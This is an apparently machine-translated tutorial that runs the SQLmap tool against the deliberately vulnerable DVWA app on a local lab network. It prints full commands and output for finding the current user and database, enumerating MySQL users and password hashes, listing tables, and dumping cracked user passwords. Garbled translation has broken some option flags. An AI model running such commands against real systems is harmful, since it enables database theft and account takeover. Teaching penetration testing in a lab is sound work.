What is SQLmap?
SQLmapIt is a free open-source tool used to detect and exploit SQL Injection Vulnerabilities. It has a great feature, that is, automatic processing of detection and exploitation (Database fingerprints, access to the underlying file system, and execute commands ).
Readers can download SQLmap source code: http://sourceforge.net/projects/sqlmap/ through the official site at SourceForge
SQLmapWho is the author?
Bernardo DameleAssumpcao Guimaraes (@ inquisb) allows readers to get in touch with him through the bernardo@sqlmap.org, and Miroslav Stampar (@ stamparm) readers can contact him through the miroslav@sqlmap.org.
At the same time, readers can also contact all SQLmap developers through the dev@sqlmap.org.
What is the command for executing SQLmap?
Go to the directory where sqlmap. py is located and run the following command:
# Python sqlmap. py-h
(The option list is too long and is somewhat different from the latest version, so it is not listed here. Please download the latest version on your machine)
SQLmap Command Options are classified as Target options, Request options, optimization, injection, detection, Techniques (Techniques), fingerprints, and enumeration.
How to Use SQLmap:
To facilitate the demonstration, we create two virtual machines:
1. the victim machine runs a web server in windows XP operating system and runs a web application (DVWA) that contains vulnerabilities ).
2. Attackers use Ubuntu 12.04, including the SQLmap program.
Objective: To use SQLmap to obtain the following information:
3. enumerate the MYSQL user name and password.
4. enumerate all databases.
5. enumerate data tables of a specified database.
6. enumerate all user names and passwords in the specified data table.
Before using SQLmap, we can obtain information such as the current session cookies to maintain the connection status during penetration. here we can use add-on named "TamperData" in Firefox to obtain the information.
The current cookie is"Security = high; PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3″.
For ease of demonstration, we set the DVWA security level to low:
Next, enter the "SQL Injection" section on the page, enter any value, and submit it. The parameters of the get Request ID are as follows:
"Http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit #"
Therefore, this page is our target page.
The following command can be used to retrieve the current database and the current user:
"./Sqlmap. py-u" http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit "-cookie =" PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3; security = low "-B-current-db-current-user"
Usage options:
1.-cookie: set our cookie value to "set DVWA security level from high to low"
2.-u: Specify the target URL
3.-B: Get the DBMS banner
4.-current-db: Get the current database
5.-current-user: Get the current user
The result is as follows:
The result is as follows:
DBMS: MySQLversion 5.0
OS versionUbuntu 12.04
Current user: root
Current db: DVWA
The following command is used to enumerate all DBMS users and password hash. Further attacks can be performed to crack the password hash:
"Sqlmap. py-u" http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit "-- cookie =" PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3; security = low "-- string =" Surname "-- users -- password"
Usage options:
1.-string: Used to match strings on the page when the query is available
2.-users: Enumerate DBMS users
3.-password: Enumerate DBMS user password hash
The result is as follows:
databasemanagement system users [142]:[*] ”@’kingasmk’[*]”@’localhost’[*]‘debian-sys-maint’@'localhost’[*]‘phpmyadmin’@'localhost’[*]‘root’@’127.0.0.1′[*] ‘root’@'::1′[*]‘root’@'kingasmk’[*]‘root’@'localhost’
Database Management System User and password hash:
[*]debian-sys-maint [1]:password hash:*C30441E06530498BC86019BF3211B94B3BAB295A[*] phpmyadmin[1]:password hash:*C30441E06530498BC86019BF3211B94B3BAB295A[*] root [4]:password hash: *C30441E06530498BC86019BF3211B94B3BAB295Apassword hash:*C30441E06530498BC86019BF3211B94B3BAB295Apassword hash:*C30441E06530498BC86019BF3211B94B3BAB295Apassword hash:*C30441E06530498BC86019BF3211B94B3BAB295A
Readers can use tools such as Cain & Abel and John & Ripper to break the password hash into plain text. The following command enumerate all database schemas in the system:
"Sqlmap. py-u" http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit"
-- Cookie = "PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3; security = low" -- dbs"
Usage options:
- -Dbs: Enumerate databases in DBMS
The result is as follows:
availabledatabases [5]:[*]dvwa[*]information_schema[*]mysql[*]performance_schema[*]phpmyadmin
Next we try to enumerate the DVWA data table and execute the following command:
"Sqlmap. py-u" http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit "-- cookie =" PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3; security = low "-D dvwa -- tables"
Usage options:
1.-D: DBMS database to be enumerated
2.-tables: Enumerate data tables in a DBMS Database
The result is as follows:
Database: dvwa
[2 tables]
+ ---- +
| Guestbook |
| Users |
+ ---- +
The following command gets the column of the User table:
"Sqlmap. py-u" http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit "-- cookie =" PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3; security = low "-D dvwa-T users -- columns"
Usage options:
- -T: DBMS database table to be enumerated
- -Columns: Enumerate all columns in the DBMS database table.
The result is as follows:
Database: dvwa
Table: users
[6 columns]
+ ---- + ----- +
| Column | Type |
+ ---- + ----- +
| Avatar | varchar (70) |
| First_name | varchar (15) |
| Last_name | varchar (15) |
| Password | varchar (32) |
| User | varchar (15) |
| User_id | int (6) |
+ ---- + ----- +
As shown above, the above is the column we are interested in, indicating the user name and password. The content of each column is extracted below. Run the following command to dump all user names and passwords in the user and password tables:
"Sqlmap. py-u" http: // 10.10.10.2/dvwa/vulnerabilities/sqli /? Id = 1 & Submit = Submit "-cookie =" PHPSESSID = 57p5g7f32b3ffv8l45qppudqn3; security = low "-D dvwa-T users-C user, password -- dump"
Usage options:
- -T: DBMS data table to be enumerated
- -C: columns in the DBMS data table to be enumerated
- -Dump: dump DBMS data table items
SQLmap will ask whether to crack the password. Press enter to confirm:
The username and plaintext password are as follows:
Database: dvwaTable: users[5 entries]+———+———+———————————————+| user_id | user| password |+———+———+———————————————+| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99(password) || 2 | gordonb |e99a18c428cb38d5f260853678922e03 (abc123) || 3 | 1337 |8d3533d75ae2c3966d7e0d4fcc69216b (charley) || 4 | pablo |0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) || 5 | smithy |5f4dcc3b5aa765d61d8327deb882cf99 (password) |+———+———+———————————————+
In this case, we can log on to the admin account to do anything.
Summary:
SQLmap is a powerful tool that can be used to simplify operations and automatically process SQL Injection detection and exploitation.
[Via infosecinstitute]